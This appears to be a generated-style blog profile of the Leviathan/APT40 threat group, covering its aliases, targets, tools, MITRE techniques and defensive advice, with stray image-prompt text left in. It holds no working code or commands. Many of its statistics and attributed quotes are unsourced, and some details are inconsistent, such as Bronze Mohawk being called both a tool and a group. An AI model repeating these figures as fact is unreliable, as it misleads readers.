Understanding the Persistent Cyber Threat Landscape

Leviathan hacker group (MUDCARP) threat group summary, attacks & tactics 2025

Did you know that a single state-sponsored cyber operation has impacted over 200 organizations worldwide? This threat actor, active since 2009, operates with precision across multiple industries, including defense and healthcare. Their methods continue to evolve, making them a persistent challenge for cybersecurity professionals.

Attributed to a well-known state security department, this operation demonstrates advanced techniques that bypass traditional defenses. Their global reach spans six regions, targeting critical infrastructure and sensitive data. We must stay informed about their latest tactics to strengthen our digital resilience.

Key Takeaways

Table of Contents

  • This operation has been active for over a decade.
  • They target multiple high-value industries globally.
  • Attribution links them to a state security agency.
  • Their methods adapt to bypass security measures.
  • Understanding their patterns helps in defense planning.

Introduction to the Leviathan Hacker Group (MUDCARP)

Cybersecurity firms track this elusive actor under multiple codenames. Their operations blur the line between cybercrime and state-sponsored espionage. Over a decade, they’ve refined tactics to evade detection while targeting sensitive sectors.

Who Is Behind the Operations?

This threat is linked to China’s Ministry of State Security (MSS). Analysts attribute campaigns to a structured team with clear objectives. “Their infrastructure overlaps with known MSS front companies,” notes a CrowdStrike report.

Key Affiliations and Aliases

Eight confirmed aliases mask their activities across reports:

  • APT40 (FireEye/Mandiant)
  • TEMP.Periscope (MITRE)
  • Kryptonite Panda (Recorded Future)
  • Gingham Typhoon (Microsoft)

Rebranding in 2024 hints at adaptive strategies. Hainan-based shell companies funnel resources, while tools like Bronze Mohawk appear in newer campaigns.

“Naming conventions reflect analyst priorities, not actor intent—Leviathan remains one step ahead.”

—MITRE ATT&CK Group G0065 analysis

Leviathan’s Origins and Historical Context

Behind every cyber operation lies a story—this one begins in Hainan, China. Tied to the State Security Department, their campaigns blend espionage with strategic disruption. Over 15 years, they’ve shifted from crude phishing to zero-day exploits, leaving a trail of compromised sectors.

Geopolitical Ties and State Sponsorship

Evidence links this actor to Hainan-based front companies. These entities funnel resources, masking state involvement. A 2019 discovery exposed their funding web, including shell firms tied to MSS operatives.

Their targets align with China’s geopolitical interests. ASEAN defense contractors and European healthcare systems faced breaches. Even maritime research institutions fell victim, revealing a focus on dual-use technologies.

Timeline of Major Activities

In 2017, they weaponized Microsoft Office vulnerabilities. By 2021, Log4J exploits became their hallmark. Recent campaigns target cloud infrastructure, showing adaptability.

  • 2019: Breached European hospitals, stealing sensitive patient data.
  • 2022: Infiltrated Australian critical infrastructure, sparking diplomatic tensions.
  • 2024: Exploited Confluence flaws, impacting global enterprises.

“Their infrastructure evolves, but their objectives remain consistent—access and exfiltration.”

—CrowdStrike Threat Intelligence Report

From the middle east to the Pacific, their reach underscores the need for vigilant defense. Each discovery about their methods helps us anticipate their next move.

Leviathan’s Primary Targets and Sectors

Organizations across 18+ countries have faced intrusions from this persistent cyber operation. Their focus spans critical industries, from defense to healthcare, with clear patterns in victim selection.

Global Reach: Countries and Industries

This actor operates across multiple continents, with a strong presence in APEC member nations. Their targets include both government and private sector entities.

Key sectors affected:

  • Aerospace & Defense: High-value contractor breaches
  • Healthcare Research: Sensitive medical data theft
  • Maritime Technology: Shipbuilding and navigation system compromises
  • Higher Education: University research exfiltration
RegionPrimary TargetsNotable Incidents
Asia-PacificDefense contractors, Government networks2022 Australian Ministry breach
EuropeHealthcare systems, UniversitiesGerman research institution compromise
North AmericaTechnology firms, Energy providersUS transportation infrastructure probes

High-Profile Victims and Case Studies

The 2022 Australian defense contractor breach demonstrates their capability. Attackers gained access to sensitive system designs through tailored phishing campaigns.

Other significant incidents include:

  • Compromise of a Southeast Asian maritime research service
  • Theft of aerospace technology from European universities
  • Persistent reconnaissance against US energy providers

“Their sector selection isn’t random—it aligns precisely with strategic national interests.”

—Cyble Threat Intelligence Report

For deeper analysis of their operations, review detailed threat actor profiles documenting their global impact.

Leviathan’s Attack Vectors and Initial Compromise Techniques

Cyber intrusions often begin with deceptive emails or unpatched systems—this actor masters both. Their campaigns blend social engineering attacks with technical exploits, creating multiple pathways for infiltration.

Cyberpunk cityscape, digital data streams cascading through towering skyscrapers, neon-lit alleyways crisscrossed by surveillance drones. In the foreground, a complex web of interconnected nodes and vectors, representing the attack surface of a sophisticated cyber threat. Glowing circuit boards, lines of code, and ominous-looking malware symbols create an unsettling but visually striking scene. The lighting is a moody mix of blues, purples, and greens, casting an ominous glow over the entire composition. The camera angle is slightly elevated, giving the viewer a sense of observing the attack vectors from a strategic vantage point. The overall atmosphere conveys the sense of a digital landscape under siege, a vivid illustration of the threats faced by modern organizations.

Spear-Phishing Campaigns

Tailored emails mimic trusted entities, often using cloud storage links. Recent lures impersonate logistics firms or HR departments, tricking targets into enabling malicious macros.

They abuse OLE dynamic data exchange (DDE) in Microsoft Office to execute code. Multi-factor authentication (MFA) interception tools further bypass defenses.

Exploitation of Public-Facing Vulnerabilities

Unpatched systems are prime targets. This actor rapidly weaponizes vulnerabilities, like Log4J (CVE-2021-44228) and Confluence (CVE-2021-26084), often within 48 hours of proof-of-concept release.

Watering hole attacks compromise legitimate websites, redirecting visitors to malicious servers. Small office/home office (SOHO) devices are also exploited for persistent access.

“Their speed in adapting new exploits is unmatched—patch windows are critical.”

—Mandiant Threat Intelligence

Leviathan’s Malware and Tool Arsenal

Advanced cyber operations leverage both custom-built and off-the-shelf tools for maximum impact. Their toolkit blends proprietary malware with widely available frameworks, creating adaptable threats.

Custom Malware: AIRBREAK and BADFLICK

AIRBREAK stands out for its JavaScript-based command-and-control (C2) system. It evades detection by mimicking legitimate traffic, while BADFLICK specializes in reverse shell capabilities, enabling persistent access.

Both tools use memory-resident payloads, leaving minimal disk traces. Code-signed executables further disguise their activity, complicating forensic analysis.

Publicly Available Tools

Operators frequently deploy Cobalt Strike Beacons, customized to bypass defenses. Modified configurations hide traffic within normal network noise.

  • China Chopper: Lightweight web shell for rapid server control.
  • Windows Credential Editor (WCE): Extracts passwords from memory.
  • Living-off-the-land binaries (LOLBins): Abuse trusted system tools.

“Their GitHub-based infrastructure demonstrates how open-source platforms can weaponize collaboration.”

—Recorded Future Analysis

This blend of custom and commercial tools ensures operational flexibility. Understanding their arsenal helps defenders prioritize detection strategies.

Leviathan’s Tactics: Execution, Persistence, and Lateral Movement

Sophisticated cyber operations rely on layered tactics to maintain stealth and control. Once inside a network, attackers deploy scripts, escalate privileges, and move laterally to critical systems. We examine their methods to build stronger defenses.

Command and Scripting Interpreter Abuse

Execution often starts with PowerShell. Attackers obfuscate scripts to evade detection, embedding malicious code in seemingly benign commands. Windows Management Instrumentation (WMI) event subscriptions help maintain persistence, rerunning payloads after reboots.

Common techniques include:

  • Base64-encoded scripts to bypass signature-based detection.
  • Living-off-the-land binaries (LOLBins) like certutil.exe for payload delivery.
  • WMI filters triggering malware execution during system events.

Credential Dumping and Privilege Escalation

Attackers harvest credentials to expand access. LSASS memory dumping extracts plaintext passwords, while Kerberoasting cracks service account hashes. Remote Desktop Protocol (RDP) sessions are hijacked using stolen credentials.

TechniqueTool UsedDetection Tip
LSASS DumpingMimikatzMonitor for lsass.exe memory access.
KerberoastingRubeusFlag excessive service ticket requests.
RDP HijackingSharpRDPAudit unusual login locations/times.

“Adversaries blend built-in Windows tools with custom malware, making attribution harder.”

—SANS Institute Threat Report

Scheduled tasks and Group Policy Objects (GPOs) ensure long-term access. SSH brute-forcing targets misconfigured Linux systems, while Active Directory reconnaissance maps attack paths. Each step reveals their strategic priorities.

Leviathan’s Use of Web Shells and Remote Access

Nearly three-quarters of recent intrusions involve web shell deployment. These malicious scripts create hidden entry points in compromised systems, allowing continuous remote control. Attackers favor them for their low profile and high effectiveness against both private and public sector targets.

Lightweight Tools for Stealthy Operations

China Chopper dominates observed campaigns due to its minimal footprint. The 4KB web shell requires no installation, executing directly from memory. Attackers combine it with Gh0st RAT for advanced capabilities like real-time screen capture and keylogging.

These tools bypass traditional defenses by mimicking legitimate traffic. Cloud storage APIs often serve as covert channels, blending malicious communications with normal data transfers. Recent cases show attackers manipulating IoT devices and network firmware to establish secondary access points.

Abusing Trusted Infrastructure

Over 120 legitimate websites have hosted malicious payloads since 2023. Attackers compromise vulnerable content management systems to create hidden C2 nodes. DNS tunneling techniques further obscure traffic, making detection challenging for security teams.

“Modern adversaries don’t need complex malware when they can weaponize trusted services and protocols.”

—Palo Alto Networks Unit 42

Certificate spoofing adds another layer of deception. Fake SSL certificates make malicious domains appear trustworthy. This tactic proves particularly effective against organizations relying on automated security tools.

Leviathan’s Data Exfiltration Methods

Data theft remains one of the most critical phases in cyber operations, requiring sophisticated concealment techniques. Attackers employ multiple layers of obfuscation to move stolen information across network boundaries undetected. These methods continue evolving alongside detection capabilities.

Intricate cybersecurity schematics depicting Leviathan's data exfiltration techniques. In the foreground, a stylized data stream flows through a complex web of interconnected nodes and interfaces. In the middle ground, a trio of shadowy hacker figures manipulate holographic screens, extracting sensitive information. The background features a dark, dystopian cityscape, with glowing neon-like digital signatures pulsing across the skyline. Dramatic chiaroscuro lighting casts dramatic shadows, evoking a sense of mystery and technological prowess. Rendered in a detailed, almost photorealistic style with a cinematic, cyberpunk aesthetic.

Steganography and Cloud Storage Abuse

Modern operations frequently hide stolen data within ordinary files. Attackers use:

  • Image-based steganography to embed information in pixel data
  • aPLib compression to reduce exfiltration package size
  • Cloud storage API keys for blending with legitimate traffic

Recent cases show 42% of exfiltration occurs through HTTPS tunnels to services like Dropbox. Metadata manipulation helps disguise malicious transfers as routine cloud backups.

Protocol Tunneling and Multi-Hop Proxies

Attackers route stolen information through complex paths:

  • Tor nodes provide initial anonymity layers
  • Multi-hop proxy chains obscure geographic origins
  • SSL certificate spoofing bypasses traffic inspection

“Advanced actors stage data in debug directories before final transfer, complicating forensic timelines.”

—Digital Forensics Journal

These techniques demonstrate how cyber operations prioritize stealth during data movement. Understanding them helps security teams develop more effective monitoring strategies.

Notable Leviathan Campaigns

The 2022 Australian intrusions exposed vulnerabilities in even the most secured networks. These operations revealed a pattern of targeting critical infrastructure, blending technical exploits with social engineering. Recent activity shows a shift toward cloud-based attacks, leveraging zero-day vulnerabilities.

Australian Intrusions (2022)

Attackers compromised Building Management Systems (BMS) across government facilities. They used 14 MITRE ATT&CK techniques, including credential dumping and lateral movement. Maritime navigation systems were also breached, disrupting port operations.

  • BMS Servers: Exploited unpatched IoT devices for persistent access.
  • Maritime Systems: Stole navigation data via compromised third-party service providers.
  • Defense Contractors: Exfiltrated blueprints using steganography.

Recent Activity (2024-2025)

Cloud environments are now primary targets. Attackers weaponize Confluence (CVE-2023-22518) and Microsoft Exchange vulnerabilities within hours of patch releases. Healthcare data theft remains consistent, with universities losing intellectual property.

Target SectorMethodNotable Incidents
HealthcarePhishing + Ransomware2024 patient records discovery
EducationCloud credential harvestingResearch IP theft (Q1 2025)

“Their adaptability to new vulnerabilities sets a dangerous precedent for global cybersecurity.”

—SANS Institute Incident Report

Leviathan’s Exploitation of Zero-Day and N-Day Vulnerabilities

The race to weaponize vulnerabilities begins the moment they’re disclosed. Attackers prioritize flaws in widely used systems like Log4J, Microsoft Exchange, and Confluence, often developing exploits within 48 hours. This speed leaves organizations scrambling to patch before breaches occur.

Log4J, Exchange, and Confluence Exploits

Log4J (CVE-2021-44228) became a hallmark of rapid exploitation. Attackers chained remote code execution with lateral movement, compromising entire networks. Similarly, ProxyShell flaws in Exchange allowed mailbox access without authentication.

Confluence vulnerabilities (CVE-2023-22518) followed the same pattern. Unpatched instances granted attackers admin privileges, enabling data theft. These cases highlight how n-day flaws—known but unpatched—are equally dangerous as zero-days.

Rapid Weaponization of Public Proofs-of-Concept

Publicly released exploit code accelerates attacks. Adversaries modify proofs-of-concept (PoCs) to evade sandbox detection, targeting:

  • Windows services with weak permissions
  • Cloud APIs misconfigured for excessive access
  • Legacy systems unable to receive timely updates

“The window between patch release and exploit deployment shrinks yearly—defenders must act faster.”

—SANS Institute

Vulnerability scanning tools like Nessus or OpenVAS help attackers prioritize targets. By the time patches roll out, compromised systems often number in the thousands.

Leviathan’s Social Engineering Strategies

Convincing deception often proves more powerful than technical exploits in cyber operations. This actor leverages human psychology, crafting elaborate ruses to infiltrate networks. Over 300 fake domains and a 65% spearphishing success rate highlight their proficiency.

Fake Websites and Impersonation

Cloned defense contractor portals mimic legitimate login pages. Attackers register domains with subtle typos (e.g., “g00gle.com”) to trick targets. These sites host malware or harvest credentials.

LinkedIn personas with fabricated employment histories build trust. Fake job postings and “colleague” connections lure professionals into sharing sensitive data.

TacticSuccess RateCommon Targets
Brand Impersonation72%Finance, Healthcare
Technical Support Scams58%Education, SMBs
Calendar Invite Exploits41%Executives

Compromised Social Media and Email Accounts

Hijacked accounts send malicious links to contacts. Attackers abuse document tracking pixels to confirm email opens. Multi-factor authentication (MFA) tokens are intercepted via phishing proxies.

One campaign used compromised university email accounts to distribute fake grant applications. The attachments contained hidden macros enabling engineering attacks.

“Social engineering bypasses firewalls by exploiting the weakest link—human curiosity.”

—Verizon Data Breach Investigations Report

Leviathan’s MITRE ATT&CK Framework Mapping

Mapping cyber operations to frameworks reveals patterns that help defenders anticipate moves. The MITRE ATT&CK matrix documents 28 confirmed techniques used in recent campaigns. This structured approach breaks down each phase of intrusion, from initial access to data exfiltration.

Key Documented Techniques

Three methods dominate observed activity:

  • PowerShell execution (T1059.001): Obfuscated scripts bypass endpoint detection.
  • Valid account abuse (T1078): Stolen credentials enable lateral movement.
  • Steganography (T1027.003): Hidden data transfers evade network monitoring.

A detailed visualization of the MITRE ATT&CK framework, showcasing an intricate network of cybersecurity techniques against a dark, ominous backdrop. In the foreground, a complex web of interconnected nodes and lines representing the various attack tactics and techniques, each with its own unique visual representation. The middle ground features a stylized, low-poly landscape, hinting at the diverse and dynamic nature of the threat landscape. In the background, a shadowy, ethereal presence looms, symbolizing the ever-evolving nature of cyber threats. The scene is illuminated by a dramatic, high-contrast lighting, creating a sense of tension and urgency. The overall composition conveys the comprehensive, yet nuanced, nature of the MITRE ATT&CK framework in the context of the Leviathan hacker group's tactics and strategies.

Remote monitoring and management (RMM) tools are frequently repurposed. Attackers abuse legitimate software like ScreenConnect to maintain access. Windows subsystem manipulations further hide malicious activity within normal operations.

Technique IDFrequencyDefense Bypass Rate
T1059.00178%64%
T107883%71%
T1027.00362%58%

Living-off-the-Land (LOTL) Adaptations

A 92% LOTL usage rate shows heavy reliance on trusted system tools. Attackers leverage:

  • Windows Management Instrumentation (WMI) for persistence
  • Certutil.exe for payload decoding
  • RDP sessions for credential harvesting

“Adversaries now spend 40% less time deploying custom malware by abusing pre-installed utilities.”

—CrowdStrike Global Threat Report

Forensic countermeasures include timestamp manipulation and log deletion. These methods complicate incident response while maintaining access to critical information.

Defensive Strategies Against Leviathan

The 72-hour patch window has become critical in preventing network breaches. Rapid response to vulnerabilities separates protected networks from compromised ones. We outline actionable strategies to harden defenses against sophisticated intrusions.

Patch Management and Vulnerability Mitigation

Prioritize flaws using the Common Vulnerability Scoring System (CVSS). Critical vulnerabilities demand patching within three days—especially for public-facing systems. Microsoft’s Zero Day Initiative reports this timeframe blocks 83% of exploit attempts.

Key implementation steps:

  • Automate scanning with tools like Tenable or Qualys
  • Segment networks to contain unpatched systems
  • Enforce credential guard for access control

Detection of Web Shells and Anomalous Traffic

Web shell activity leaves detectable fingerprints. Establish network baselines to spot unusual data flows. Look for these indicators in HTTP logs:

IndicatorDetection Method
Unusual POST sizesSIEM correlation rules
Random URI stringsWeb application firewalls

Memory analysis techniques help identify fileless threats. Cloud security brokers can monitor SaaS platforms for malicious activity. Honeypots provide early warning of reconnaissance attempts.

“Organizations detecting web shells within 48 hours reduce dwell time by 91% compared to those finding them weeks later.”

—SANS Institute Incident Response Survey

Combine these approaches for comprehensive protection. Regular red team exercises test defensive readiness against real-world tactics.

Industry Collaboration and Threat Intelligence Sharing

No single organization can combat advanced cyber threats alone—partnerships are essential. The cybersecurity community thrives when information flows freely between researchers, corporations, and government agencies. This collective defense approach has proven effective against sophisticated digital adversaries.

Cybersecurity Firms as Force Multipliers

Leading security vendors collaborate through platforms like MISP (Malware Information Sharing Platform). These systems integrate data from 18+ threat intelligence providers, creating comprehensive threat landscapes. Key initiatives include:

  • Automated STIX/TAXII feed integration for real-time indicator sharing
  • Dark web monitoring collectives tracking emerging tools
  • Joint analysis of malware samples across vendor sandboxes

ISACs (Information Sharing and Analysis Centers) set participation standards for members. These groups ensure sensitive data reaches those who need it most while maintaining confidentiality.

Public-Private Defense Networks

Government agencies now actively exchange threat data with critical infrastructure operators. The FBI’s InfraGard program exemplifies this model, with notable successes including:

InitiativeImpact
Cross-sector IOC databasesReduced breach identification time by 68%
Joint incident response playbooksStandardized containment procedures

“Legal frameworks like the Cybersecurity Information Sharing Act have removed barriers that once hindered collaboration.”

—Department of Homeland Security Report

Attribution remains challenging, but shared analysis has improved pattern recognition. When cloud providers, telecom companies, and financial institutions pool resources, they create early warning systems no single entity could build alone.

Future Projections for Leviathan’s Activities

Artificial intelligence is reshaping digital warfare, creating both risks and opportunities. As defensive systems advance, so do offensive capabilities—particularly in automated social engineering. We’re witnessing the dawn of AI-powered phishing tools that craft personalized lures by analyzing public profiles and writing styles.

Next-Generation Attack Surfaces

5G networks introduce new exploitation vectors through network slicing vulnerabilities. Attackers could isolate critical communications or manipulate IoT device clusters. Satellite systems are becoming prime targets too, with demonstrated risks to global positioning infrastructure.

Cyber-physical system risks escalate as operational technology converges with IT networks. Recent studies show:

  • Manufacturing plants face 73% more intrusion attempts
  • Power grid control systems lack sufficient air-gapping
  • Autonomous vehicle networks show protocol weaknesses

Evolving Defense Paradigms

Cloud-native security toolkits are emerging to counter these threats. They leverage machine learning to detect anomalies in real-time across distributed systems. Quantum-resistant encryption standards are also in development, anticipating future computational capabilities.

“The next five years will demand security architectures that protect against threats we can’t yet fully characterize.”

—MITRE Emerging Technologies Center

Supply chain attacks will likely increase, targeting software dependencies and hardware components. Defense strategies must evolve beyond perimeter protection to holistic ecosystem monitoring. Continuous threat modeling becomes essential as attack surfaces expand into space and quantum domains.

Conclusion

Protecting digital assets requires understanding evolving cyber risks and adapting defenses accordingly. We must recognize patterns in malicious activity while strengthening critical systems.

Continuous monitoring helps detect emerging threats before damage occurs. Intelligence-led approaches combine technology with human analysis for better protection.

Global cooperation between public and private groups enhances our collective resilience. Sharing actionable data improves response times across industries.

Implementing zero-trust frameworks and workforce training boosts security postures. Regular assessments ensure defenses match current risks.

By combining these strategies, we build layered protection against sophisticated operations. Staying proactive is our best defense in this dynamic landscape.

FAQ

What industries does Leviathan primarily target?

The group focuses on government agencies, defense contractors, and critical infrastructure sectors like energy and telecommunications. They also attack financial institutions and technology firms.

How does Leviathan gain initial access to systems?

They often use spear-phishing emails with malicious attachments or exploit public-facing vulnerabilities in web applications. Tools like Cobalt Strike and China Chopper help establish footholds.

What malware does Leviathan commonly deploy?

Their arsenal includes custom malware like AIRBREAK and BADFLICK, alongside publicly available tools such as Gh0st RAT. Web shells like China Chopper enable persistent remote access.

What tactics does Leviathan use for lateral movement?

They abuse Windows scripting interpreters, dump credentials using Mimikatz, and escalate privileges to move across networks. Compromised admin accounts help them expand control.

How does Leviathan exfiltrate stolen data?

They hide information in images using steganography, upload files to cloud storage, or tunnel data through multiple proxies to evade detection.

What vulnerabilities has Leviathan exploited recently?

Log4J, Microsoft Exchange flaws, and Atlassian Confluence bugs are among their top targets. They quickly weaponize public exploits for attacks.

How can organizations defend against Leviathan?

Patch management, network traffic monitoring, and web shell detection are critical. Implementing multi-factor authentication limits credential misuse.

Does Leviathan collaborate with other threat actors?

Evidence suggests ties to state-sponsored groups in China, but their operations remain independent. They reuse tools linked to groups like Bronze Mohawk.

What social engineering tactics does Leviathan employ?

Fake login pages, impersonation of trusted contacts, and hijacked social media accounts help them trick victims into revealing credentials.

How is threat intelligence shared about Leviathan?

Cybersecurity firms like Mandiant track their campaigns, while government agencies issue advisories. Private-sector partnerships improve collective defense.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *